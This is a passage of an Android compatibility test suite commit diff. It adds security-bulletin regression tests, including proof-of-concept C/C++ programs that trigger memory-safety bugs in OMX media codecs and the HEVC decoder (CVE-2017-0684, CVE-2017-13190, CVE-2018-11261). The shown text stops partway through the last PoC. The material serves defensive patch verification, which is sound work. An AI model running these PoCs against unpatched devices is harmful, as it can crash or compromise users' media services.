Merge "[RESTRICT AUTOMERGE]: Properly check crashes for Ittiam tests." into oc-dev
diff --git a/common/host-side/tradefed/tests/src/com/android/compatibility/common/tradefed/presubmit/ValidateTestsAbi.java b/common/host-side/tradefed/tests/src/com/android/compatibility/common/tradefed/presubmit/ValidateTestsAbi.java
index eec99a7..336f096 100644
--- a/common/host-side/tradefed/tests/src/com/android/compatibility/common/tradefed/presubmit/ValidateTestsAbi.java
+++ b/common/host-side/tradefed/tests/src/com/android/compatibility/common/tradefed/presubmit/ValidateTestsAbi.java
@@ -114,6 +114,16 @@
* This binary only exists in 32-bit.
*/
BINARY_EXCEPTIONS.add("CVE-2018-934932");
+
+ /**
+ * This binary only exists in 32-bit.
+ */
+ BINARY_EXCEPTIONS.add("CVE-2017-068432");
+
+ /**
+ * This binary only exists in 32-bit.
+ */
+ BINARY_EXCEPTIONS.add("CVE-2017-1319032");
}
/**
diff --git a/hostsidetests/appsecurity/Android.mk b/hostsidetests/appsecurity/Android.mk
index 1e6b96f..f45d960 100644
--- a/hostsidetests/appsecurity/Android.mk
+++ b/hostsidetests/appsecurity/Android.mk
@@ -28,7 +28,7 @@
LOCAL_CTS_TEST_PACKAGE := android.appsecurity
# tag this module as a cts test artifact
-LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_COMPATIBILITY_SUITE := cts sts
LOCAL_REQUIRED_MODULES := \
CtsCorruptApkTests_b71360999 \
diff --git a/hostsidetests/appsecurity/src/android/appsecurity/cts/AppSecurityTests.java b/hostsidetests/appsecurity/src/android/appsecurity/cts/AppSecurityTests.java
index 00bac12..7bfd18e 100644
--- a/hostsidetests/appsecurity/src/android/appsecurity/cts/AppSecurityTests.java
+++ b/hostsidetests/appsecurity/src/android/appsecurity/cts/AppSecurityTests.java
@@ -16,6 +16,8 @@
package android.appsecurity.cts;
+import android.platform.test.annotations.SecurityTest;
+
import com.android.compatibility.common.tradefed.build.CompatibilityBuildHelper;
import com.android.ddmlib.Log;
import com.android.tradefed.build.IBuildInfo;
@@ -266,6 +268,7 @@
* Test that an app cannot use a signature-enforced permission if it is signed with a different
* certificate than the app that declared the permission.
*/
+ @SecurityTest
public void testPermissionDiffCert() throws Exception {
Log.i(LOG_TAG, "installing app that attempts to use permission of another app");
try {
diff --git a/hostsidetests/appsecurity/test-apps/Android.mk b/hostsidetests/appsecurity/test-apps/Android.mk
index 1d4e58f..69599b5 100644
--- a/hostsidetests/appsecurity/test-apps/Android.mk
+++ b/hostsidetests/appsecurity/test-apps/Android.mk
@@ -17,7 +17,7 @@
include $(CLEAR_VARS)
# tag this module as a cts test artifact
-LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_COMPATIBILITY_SUITE := cts sts
# Build the test APKs using their own makefiles
include $(call all-makefiles-under,$(LOCAL_PATH))
diff --git a/hostsidetests/appsecurity/test-apps/PermissionDeclareApp/Android.mk b/hostsidetests/appsecurity/test-apps/PermissionDeclareApp/Android.mk
index e0e900e..c7f3323 100644
--- a/hostsidetests/appsecurity/test-apps/PermissionDeclareApp/Android.mk
+++ b/hostsidetests/appsecurity/test-apps/PermissionDeclareApp/Android.mk
@@ -26,7 +26,7 @@
LOCAL_PACKAGE_NAME := CtsPermissionDeclareApp
# tag this module as a cts test artifact
-LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_COMPATIBILITY_SUITE := cts sts
# sign this app with a different cert than CtsUsePermissionDiffCert
LOCAL_CERTIFICATE := cts/hostsidetests/appsecurity/certs/cts-testkey1
diff --git a/hostsidetests/appsecurity/test-apps/PermissionDeclareAppCompat/Android.mk b/hostsidetests/appsecurity/test-apps/PermissionDeclareAppCompat/Android.mk
index d4567e3..bbda31c 100644
--- a/hostsidetests/appsecurity/test-apps/PermissionDeclareAppCompat/Android.mk
+++ b/hostsidetests/appsecurity/test-apps/PermissionDeclareAppCompat/Android.mk
@@ -26,7 +26,7 @@
LOCAL_PACKAGE_NAME := CtsPermissionDeclareAppCompat
# tag this module as a cts test artifact
-LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_COMPATIBILITY_SUITE := cts sts
# sign this app with a different cert than CtsUsePermissionDiffCert
LOCAL_CERTIFICATE := cts/hostsidetests/appsecurity/certs/cts-testkey1
diff --git a/hostsidetests/appsecurity/test-apps/UsePermissionDiffCert/Android.mk b/hostsidetests/appsecurity/test-apps/UsePermissionDiffCert/Android.mk
index bda6782..144aa60 100644
--- a/hostsidetests/appsecurity/test-apps/UsePermissionDiffCert/Android.mk
+++ b/hostsidetests/appsecurity/test-apps/UsePermissionDiffCert/Android.mk
@@ -27,7 +27,7 @@
LOCAL_PACKAGE_NAME := CtsUsePermissionDiffCert
# tag this module as a cts test artifact
-LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_COMPATIBILITY_SUITE := cts sts
# sign this app with a different cert than CtsPermissionDeclareApp
LOCAL_CERTIFICATE := cts/hostsidetests/appsecurity/certs/cts-testkey2
diff --git a/hostsidetests/securitybulletin/AndroidTest.xml b/hostsidetests/securitybulletin/AndroidTest.xml
index 9d3b3dc..5a8cdf6 100644
--- a/hostsidetests/securitybulletin/AndroidTest.xml
+++ b/hostsidetests/securitybulletin/AndroidTest.xml
@@ -184,6 +184,11 @@
<option name="push" value="CVE-2018-9424->/data/local/tmp/CVE-2018-9424" />
<!--__________________-->
+ <!-- Bulletin 2018-09 -->
+ <!-- Please add tests solely from this bulletin below to avoid merge conflict -->
+ <option name="push" value="CVE-2018-11261->/data/local/tmp/CVE-2018-11261" />
+
+ <!--__________________-->
<!-- Bulletin 2018-10 -->
<!-- Please add tests solely from this bulletin below to avoid merge conflict -->
@@ -220,6 +225,7 @@
<option name="push" value="testhevc_mem232->/data/local/tmp/testhevc_mem2" />
<option name="push" value="testavc_mem232->/data/local/tmp/testavc_mem2" />
<option name="push" value="testmpeg2_mem232->/data/local/tmp/testmpeg2_mem2" />
+ <option name="push" value="CVE-2017-068432->/data/local/tmp/CVE-2017-0684" />
<option name="append-bitness" value="false" />
</target_preparer>
@@ -238,6 +244,22 @@
<option name="append-bitness" value="false" />
</target_preparer>
+ <!-- The following tests hit either 32-bit or 64-bit, but not both. All tests in this -->
+ <!-- section should take care to build either 32 bit or 64 bit binary, but not both. -->
+ <!-- In order to pass tradefed presubmit ValidateTestsAbi, add an exception. -->
+ <!-- For more details, visit b/127856694 -->
+ <target_preparer class="com.android.compatibility.common.tradefed.targetprep.FilePusher">
+ <option name="cleanup" value="true" />
+
+ <!-- Please add 32-bit binary tests below to avoid merge conflict -->
+ <option name="push" value="CVE-2017-1319032->/data/local/tmp/CVE-2017-13190" />
+
+ <!-- Please add 64-bit binary tests below to avoid merge conflict -->
+
+
+ <option name="append-bitness" value="false" />
+ </target_preparer>
+
<target_preparer class="com.android.tradefed.targetprep.suite.SuiteApkInstaller">
<option name="cleanup-apks" value="true" />
<option name="test-file-name" value="OomCatcher.apk" />
diff --git a/hostsidetests/securitybulletin/res/bug_33139050.h264 b/hostsidetests/securitybulletin/res/bug_33139050.h264
new file mode 100644
index 0000000..32545d4
--- /dev/null
+++ b/hostsidetests/securitybulletin/res/bug_33139050.h264
Binary files differ
diff --git a/hostsidetests/securitybulletin/res/cve_2017_0589.hevc b/hostsidetests/securitybulletin/res/cve_2017_0589.hevc
new file mode 100644
index 0000000..b0f5398
--- /dev/null
+++ b/hostsidetests/securitybulletin/res/cve_2017_0589.hevc
Binary files differ
diff --git a/hostsidetests/securitybulletin/res/cve_2017_13193.hevc b/hostsidetests/securitybulletin/res/cve_2017_13193.hevc
new file mode 100644
index 0000000..35fcb29
--- /dev/null
+++ b/hostsidetests/securitybulletin/res/cve_2017_13193.hevc
Binary files differ
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-5862/Android.mk b/hostsidetests/securitybulletin/securityPatch/CVE-2016-5862/Android.mk
index c368779..d6efe13 100644
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2016-5862/Android.mk
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2016-5862/Android.mk
@@ -7,7 +7,7 @@
LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
-LOCAL_COMPATIBILITY_SUITE := cts sts
+LOCAL_COMPATIBILITY_SUITE := cts sts vts
LOCAL_CTS_TEST_PACKAGE := android.security.cts
LOCAL_ARM_MODE := arm
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-5867/Android.mk b/hostsidetests/securitybulletin/securityPatch/CVE-2016-5867/Android.mk
index f7968eb..d7f4ae9 100644
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2016-5867/Android.mk
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2016-5867/Android.mk
@@ -7,7 +7,7 @@
LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
-LOCAL_COMPATIBILITY_SUITE := cts sts
+LOCAL_COMPATIBILITY_SUITE := cts sts vts
LOCAL_CTS_TEST_PACKAGE := android.security.cts
LOCAL_ARM_MODE := arm
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2017-0684/Android.mk b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0684/Android.mk
new file mode 100644
index 0000000..ca800e2
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0684/Android.mk
@@ -0,0 +1,48 @@
+# Copyright (C) 2019 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+include $(CLEAR_VARS)
+
+LOCAL_MODULE := CVE-2017-0684
+LOCAL_SRC_FILES := poc.cpp
+LOCAL_SRC_FILES += ../includes/omxUtils.cpp
+LOCAL_MULTILIB := 32
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_C_INCLUDES += frameworks/native/include/media/openmax
+LOCAL_C_INCLUDES += frameworks/av/media/libstagefright/
+LOCAL_C_INCLUDES += frameworks/native/include/media/hardware/
+LOCAL_C_INCLUDES += system/libhidl/transport/token/1.0/utils/include
+LOCAL_C_INCLUDES += ../includes
+LOCAL_SHARED_LIBRARIES := liblog
+LOCAL_SHARED_LIBRARIES += libbinder
+LOCAL_SHARED_LIBRARIES += libstagefright
+LOCAL_SHARED_LIBRARIES += libstagefright_foundation
+LOCAL_SHARED_LIBRARIES += libutils
+LOCAL_SHARED_LIBRARIES += libmedia
+LOCAL_SHARED_LIBRARIES += libui
+LOCAL_SHARED_LIBRARIES += libcutils
+LOCAL_SHARED_LIBRARIES += libhidlbase
+LOCAL_SHARED_LIBRARIES += libhidlmemory
+LOCAL_SHARED_LIBRARIES += android.hidl.allocator@1.0
+LOCAL_SHARED_LIBRARIES += android.hidl.memory@1.0
+LOCAL_SHARED_LIBRARIES += android.hardware.media.omx@1.0
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts sts vts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+LOCAL_CPPFLAGS += -Wall -Werror
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2017-0684/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0684/poc.cpp
new file mode 100644
index 0000000..52231ec
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0684/poc.cpp
@@ -0,0 +1,232 @@
+/**
+ * Copyright (C) 2019 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#include "../includes/omxUtils.h"
+extern bool mUseTreble;
+sp<IAllocator> mAllocator = IAllocator::getService("ashmem");
+
+int allocateHidlPortBuffers(OMX_U32 portIndex,
+ Vector<Buffer> *buffers) {
+ buffers->clear();
+ OMX_PARAM_PORTDEFINITIONTYPE def;
+ int err = omxUtilsGetParameter(portIndex, &def);
+ omxExitOnError(err);
+
+ for (OMX_U32 i = 0; i < def.nBufferCountActual; ++i) {
+ Buffer buffer;
+ buffer.mFlags = 0;
+ bool success;
+ auto transStatus = mAllocator->allocate(def.nBufferSize,
+ [&success, &buffer](
+ bool s,
+ hidl_memory const& m) {
+ success = s;
+ buffer.mHidlMemory = m;
+ });
+ omxExitOnError(!transStatus.isOk());
+ omxExitOnError(!success);
+ omxUtilsUseBuffer(portIndex, buffer.mHidlMemory, &buffer.mID);
+ buffers->push(buffer);
+ }
+ return OK;
+}
+int main() {
+ /* Initialize OMX for the specified codec */
+ status_t ret = omxUtilsInit((char *) "OMX.google.h264.encoder");
+ omxExitOnError(ret);
+
+ /* Get OMX input port parameters */
+ OMX_PARAM_PORTDEFINITIONTYPE *params =
+ (OMX_PARAM_PORTDEFINITIONTYPE *) malloc(
+ sizeof(OMX_PARAM_PORTDEFINITIONTYPE));
+ memset(params, 0, sizeof(OMX_PARAM_PORTDEFINITIONTYPE));
+ omxUtilsGetParameter(OMX_UTILS_IP_PORT, params);
+ int ipBufferSize = params->nBufferSize;
+ int ipBufferCount = params->nBufferCountActual;
+
+ /* Set port mode */
+ omxUtilsSetPortMode(OMX_UTILS_IP_PORT, IOMX::kPortModeDynamicANWBuffer);
+
+ /* Allocate input buffers and graphic buffer */
+ sp<GraphicBuffer> graphicbuffer = new GraphicBuffer(
+ params->format.video.nFrameWidth, params->format.video.nFrameHeight,
+ HAL_PIXEL_FORMAT_RGBX_8888,
+ android::GraphicBuffer::USAGE_HW_VIDEO_ENCODER, "me");
+
+ IOMX::buffer_id *ipBufferId = new IOMX::buffer_id[ipBufferCount];
+
+ int i;
+ Vector<Buffer> inputBuffers;
+ Vector<Buffer> outputBuffers;
+ /* Register input buffers with OMX component */
+ if(mUseTreble) {
+ allocateHidlPortBuffers(OMX_UTILS_IP_PORT, &inputBuffers);
+ for (i = 0; i < ipBufferCount; i++) {
+ ipBufferId[i] = inputBuffers[i].mID;
+ }
+ } else {
+ sp<MemoryDealer> dealerIn = new MemoryDealer(
+ ipBufferSize * ipBufferCount);
+ for (i = 0; i < ipBufferCount; i++) {
+ sp<IMemory> memory = dealerIn->allocate(ipBufferSize);
+ memset(memory->pointer(), 0xff, ipBufferSize);
+ *(MetadataBufferType *) (memory->pointer()) =
+ kMetadataBufferTypeGrallocSource;
+ OMXBuffer omxBuf(memory);
+ omxUtilsUseBuffer(OMX_UTILS_IP_PORT, omxBuf, &ipBufferId[i]);
+ }
+ }
+
+ /* Get OMX output port parameters */
+ memset(params, 0, sizeof(OMX_PARAM_PORTDEFINITIONTYPE));
+ omxUtilsGetParameter(OMX_UTILS_OP_PORT, params);
+ int opBufferSize = params->nBufferSize;
+ int opBufferCount = params->nBufferCountActual;
+
+ /* Allocate output buffers */
+ IOMX::buffer_id *opBufferId = new IOMX::buffer_id[opBufferCount];
+
+ /* Register output buffers with OMX component */
+ if(mUseTreble) {
+ allocateHidlPortBuffers(OMX_UTILS_OP_PORT, &outputBuffers);
+ for (i = 0; i < opBufferCount; i++) {
+ opBufferId[i] = outputBuffers[i].mID;
+ }
+ } else {
+ sp<MemoryDealer> dealerOut = new MemoryDealer(
+ opBufferSize * opBufferCount);
+ for (i = 0; i < opBufferCount; i++) {
+ sp<IMemory> memoryout = dealerOut->allocate(opBufferSize);
+ memset(memoryout->pointer(), 0xff, opBufferSize);
+ OMXBuffer omxBuf(memoryout);
+ omxUtilsUseBuffer(OMX_UTILS_OP_PORT, omxBuf, &opBufferId[i]);
+ }
+ }
+
+ /* Do OMX State chage to Idle */
+ omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateIdle);
+
+ /* Do OMX State chage to Executing */
+ omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateExecuting);
+
+ /* Empty input buffers and fill output buffers */
+ {
+ OMXBuffer omxBuf(graphicbuffer);
+ omxUtilsEmptyBuffer(ipBufferId[0], omxBuf, 0, 0, -1);
+ }
+
+ {
+ OMXBuffer omxBuf(0, opBufferSize);
+ omxUtilsFillBuffer(opBufferId[0], omxBuf, -1);
+ }
+
+ /* Do OMX State chage to Idle */
+ omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateIdle);
+
+ /* Do OMX State chage to Loaded */
+ omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateLoaded);
+
+ /* Free input and output buffers */
+ for (i = 0; i < ipBufferCount; i++) {
+ omxUtilsFreeBuffer(OMX_UTILS_IP_PORT, ipBufferId[i]);
+ }
+ for (i = 0; i < opBufferCount; i++) {
+ omxUtilsFreeBuffer(OMX_UTILS_OP_PORT, opBufferId[i]);
+ }
+
+ /*********************************************************************/
+ /* Following code exposes vulnerability */
+ /*********************************************************************/
+ Vector<Buffer> newInputBuffers;
+ Vector<Buffer> newOutputBuffers;
+
+ /* Get OMX input port parameters, change settings and set output port*/
+ /* port parameters */
+ memset(params, 0, sizeof(OMX_PARAM_PORTDEFINITIONTYPE));
+ omxUtilsGetParameter(OMX_UTILS_IP_PORT, params);
+ params->nBufferSize = 38016;
+ params->format.video.nFrameWidth = 2000;
+ params->format.video.nFrameHeight = 2000;
+ omxUtilsSetParameter(OMX_UTILS_IP_PORT, params);
+
+ /* Allocated input buffers and register with OMX component */
+ if(mUseTreble) {
+ allocateHidlPortBuffers(OMX_UTILS_IP_PORT, &newInputBuffers);
+ for (i = 0; i < ipBufferCount; i++) {
+ ipBufferId[i] = newInputBuffers[i].mID;
+ }
+ } else {
+ sp<MemoryDealer> dealerIn2 = new MemoryDealer(
+ ipBufferSize * ipBufferCount);
+ for (i = 0; i < ipBufferCount; i++) {
+ sp<IMemory> memory = dealerIn2->allocate(ipBufferSize);
+ memset(memory->pointer(), 0xff, ipBufferSize);
+ OMXBuffer omxBuf(memory);
+ omxUtilsUseBuffer(OMX_UTILS_IP_PORT, omxBuf, &ipBufferId[i]);
+ }
+ }
+
+ /* Allocated output buffers and register with OMX component */
+ if(mUseTreble) {
+ allocateHidlPortBuffers(OMX_UTILS_OP_PORT, &newOutputBuffers);
+ for (i = 0; i < opBufferCount; i++) {
+ opBufferId[i] = newOutputBuffers[i].mID;
+ }
+ } else {
+ sp<MemoryDealer> dealerOut2 = new MemoryDealer(
+ opBufferSize * opBufferCount);
+ for (i = 0; i < opBufferCount; i++) {
+ sp<IMemory> memoryout = dealerOut2->allocate(opBufferSize);
+ memset(memoryout->pointer(), 0xff, opBufferSize);
+ OMXBuffer omxBuf(memoryout);
+ omxUtilsUseBuffer(OMX_UTILS_OP_PORT, omxBuf, &opBufferId[i]);
+ }
+ }
+
+ /* Do OMX State chage to Idle */
+ omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateIdle);
+
+ /* Do OMX State chage to Executing */
+ omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateExecuting);
+
+ /* Empty input buffers and fill output buffers */
+ {
+ OMXBuffer omxBuf(graphicbuffer);
+ omxUtilsEmptyBuffer(ipBufferId[0], omxBuf, 0, 0, -1);
+ }
+
+ {
+ OMXBuffer omxBuf(0, opBufferSize);
+ omxUtilsFillBuffer(opBufferId[0], omxBuf, -1);
+ }
+
+ /* Do OMX State change to Idle */
+ omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateIdle);
+
+ /* Do OMX State change to Loaded */
+ omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateLoaded);
+
+ /* Free input and output buffers */
+ for (i = 0; i < ipBufferCount; i++) {
+ omxUtilsFreeBuffer(OMX_UTILS_IP_PORT, ipBufferId[i]);
+ }
+ for (i = 0; i < opBufferCount; i++) {
+ omxUtilsFreeBuffer(OMX_UTILS_OP_PORT, opBufferId[i]);
+ }
+
+ /* Free OMX resources */
+ omxUtilsFreeNode();
+ return 0;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2017-13190/Android.mk b/hostsidetests/securitybulletin/securityPatch/CVE-2017-13190/Android.mk
new file mode 100644
index 0000000..2f110cc
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2017-13190/Android.mk
@@ -0,0 +1,33 @@
+# Copyright (C) 2019 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+include $(CLEAR_VARS)
+
+LOCAL_MODULE := CVE-2017-13190
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := 32
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_C_INCLUDES := external/libhevc/common
+LOCAL_C_INCLUDES += external/libhevc/decoder
+LOCAL_SHARED_LIBRARIES := libstagefright_soft_hevcdec
+LOCAL_SHARED_LIBRARIES += liblog
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts sts vts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+LOCAL_CFLAGS += -Wall -Werror
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2017-13190/poc.c b/hostsidetests/securitybulletin/securityPatch/CVE-2017-13190/poc.c
new file mode 100644
index 0000000..71e415b
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2017-13190/poc.c
@@ -0,0 +1,56 @@
+/**
+ * Copyright (C) 2019 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include "ihevc_typedefs.h"
+#include "ihevcd_cxa.h"
+
+void *ihevca_aligned_malloc(void *pv_ctxt, WORD32 alignment, WORD32 i4_size) {
+ (void) pv_ctxt;
+ (void) alignment;
+ (void) i4_size;
+ return NULL;
+}
+
+void ihevca_aligned_free(void *pv_ctxt, void *pv_buf) {
+ (void) pv_ctxt;
+ free(pv_buf);
+ return;
+}
+
+int main() {
+ WORD32 ret;
+ ihevcd_cxa_create_ip_t s_create_ip;
+ ihevcd_cxa_create_op_t s_create_op;
+
+ s_create_ip.s_ivd_create_ip_t.e_cmd = IVD_CMD_CREATE;
+ s_create_ip.s_ivd_create_ip_t.u4_share_disp_buf = 0;
+ s_create_ip.s_ivd_create_ip_t.e_output_format = IV_YUV_420P;
+ s_create_ip.s_ivd_create_ip_t.pf_aligned_alloc = ihevca_aligned_malloc;
+ s_create_ip.s_ivd_create_ip_t.pf_aligned_free = ihevca_aligned_free;
+ s_create_ip.s_ivd_create_ip_t.pv_mem_ctxt = NULL;
+ s_create_ip.s_ivd_create_ip_t.u4_size = sizeof(ihevcd_cxa_create_ip_t);
+ s_create_op.s_ivd_create_op_t.u4_size = sizeof(ihevcd_cxa_create_op_t);
+
+ /* Create decoder instance */
+ ret = ihevcd_cxa_api_function(NULL, (void *) &s_create_ip,
+ (void *) &s_create_op);
+
+ return 0;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-11261/Android.mk b/hostsidetests/securitybulletin/securityPatch/CVE-2018-11261/Android.mk
new file mode 100644
index 0000000..fa13952
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-11261/Android.mk
@@ -0,0 +1,23 @@
+LOCAL_PATH := $(call my-dir)
+include $(CLEAR_VARS)
+
+LOCAL_MODULE := CVE-2018-11261
+LOCAL_SRC_FILES := poc.cpp
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+LOCAL_C_INCLUDES:= \
+ $(TOP)/frameworks/av/include/media/ \
+ $(TOP)/frameworks/native/include/media/openmax \
+ $(TOP)/hardware/libhardware/modules/gralloc/ \
+ $(TOP)/frameworks/av/media/libstagefright/ \
+ $(TARGET_OUT_INTERMEDIATES)/include/mm-core/
+
+LOCAL_SHARED_LIBRARIES += libmedia libbinder libui libgui libutils
+
+LOCAL_COMPATIBILITY_SUITE := cts sts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+LOCAL_ARM_MODE := arm
+LOCAL_CPPFLAGS+= -Wall -Werror
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-11261/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-11261/poc.cpp
new file mode 100644
index 0000000..91d5b0e
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-11261/poc.cpp
@@ -0,0 +1,133 @@
+/**
+ * CVE-2018-11261
+ */
+#undef _GNU_SOURCE
+#define _GNU_SOURCE
+#include "../includes/common.h"
+#include "OMX_Component.h"
+#include <binder/IServiceManager.h>
+#include <binder/ProcessState.h>
+#include <media/IMediaPlayerService.h>
+#include <media/IOMX.h>
+#include <media/OMXBuffer.h>
+#include <media/hardware/HardwareAPI.h>
+#include <omx/OMXUtils.h>
+#include <stdlib.h>
+#include <time.h>
+
+using namespace android;
+
+struct DummyOMXObserver : public BnOMXObserver {
+public:
+ DummyOMXObserver() {}
+
+ virtual void onMessages(const std::list<omx_message> &messages __unused) {}
+
+protected:
+ virtual ~DummyOMXObserver() {}
+};
+
+struct DeathRecipient : public IBinder::DeathRecipient {
+ DeathRecipient() : mDied(false) {}
+ bool mDied;
+ virtual void binderDied(const wp<IBinder> &who __unused) { mDied = true; }
+ bool died() const { return mDied; }
+};
+
+extern bool connectOMX(sp<IOMX> &omx) {
+ sp<IBinder> binder;
+ sp<IServiceManager> sm = defaultServiceManager();
+
+ binder = sm->getService(String16("media.player"));
+ sp<IMediaPlayerService> service = interface_cast<IMediaPlayerService>(binder);
+
+ if (binder == NULL) {
+ return false;
+ }
+ omx = service->getOMX();
+ if (omx == NULL) {
+ return false;
+ }
+ return true;
+}
+
+int poc() {
+ sp<IOMX> service;
+ if (connectOMX(service) == false) {
+ return EXIT_FAILURE;
+ }
+ sp<IOMXNode> node = 0;
+ OMXBuffer omxBuf;
+ int fenceFd = -1;
+ sp<DummyOMXObserver> observer = new DummyOMXObserver();
+
+ const char *codecName = "OMX.qcom.video.decoder.avc";
+ status_t err = service->allocateNode(codecName, observer, &node);
+ if (err != OK) {
+ return EXIT_FAILURE;
+ }
+ sp<DeathRecipient> deathRecipient(new DeathRecipient());
+ IInterface::asBinder(service)->linkToDeath(deathRecipient);
+
+ err = node->sendCommand(OMX_CommandStateSet, 2);
+ // get input port parameters
+ OMX_PARAM_PORTDEFINITIONTYPE def;
+ InitOMXParams(&def);
+ def.nPortIndex = 0;
+ OMX_INDEXTYPE omx_indextype = OMX_IndexParamPortDefinition;
+ err = node->getParameter(omx_indextype, &def, sizeof(def));
+
+ int inMemSize = def.nBufferCountActual * def.nBufferSize;
+ int inBufferCnt = def.nBufferCountActual;
+ int inBufferSize = inMemSize / inBufferCnt;
+ sp<MemoryDealer> dealerIn = new MemoryDealer(inMemSize);
+ IOMX::buffer_id *inBufferId = new IOMX::buffer_id[inBufferCnt];
+
+ // get output port parameters
+ InitOMXParams(&def);
+ def.nPortIndex = 1;
+ err = node->getParameter(omx_indextype, &def, sizeof(def));
+
+ // prepare output port buffers
+ int outMemSize = def.nBufferCountActual * def.nBufferSize;
+ int outBufferCnt = def.nBufferCountActual;
+ int outBufferSize = outMemSize / outBufferCnt;
+ sp<MemoryDealer> dealerOut = new MemoryDealer(outMemSize);
+
+ for (int i = 0; i < inBufferCnt; i++) {
+ sp<IMemory> memory = dealerIn->allocate(inBufferSize);
+ memset(memory->pointer(), 0xcd, inBufferSize);
+ OMXBuffer omxBuf(memory);
+ err = node->useBuffer(0, omxBuf, &inBufferId[i]);
+ }
+
+ for (int i = 0; i < outBufferCnt; i++) {
+ sp<IMemory> memory = dealerOut->allocate(outBufferSize);
+ memset(memory->pointer(), 0x9a, outBufferSize);
+ }
+
+ // change state from idle to executing
+ err = node->sendCommand(OMX_CommandStateSet, 3);
+
+ for (int i = 0; i < inBufferCnt; i++) {
+ err = node->emptyBuffer(inBufferId[i], omxBuf, 0, 0, fenceFd);
+ node->freeBuffer(1, inBufferId[i]);
+ }
+ sleep(1);
+ node->freeNode();
+ if (deathRecipient->died()) {
+ exit(0); //binder died
+ }
+ return 0;
+}
+
+int main() {
+ sp<ProcessState> proc(ProcessState::self());
+ ProcessState::self()->startThreadPool();
+ time_t test_started = start_timer();
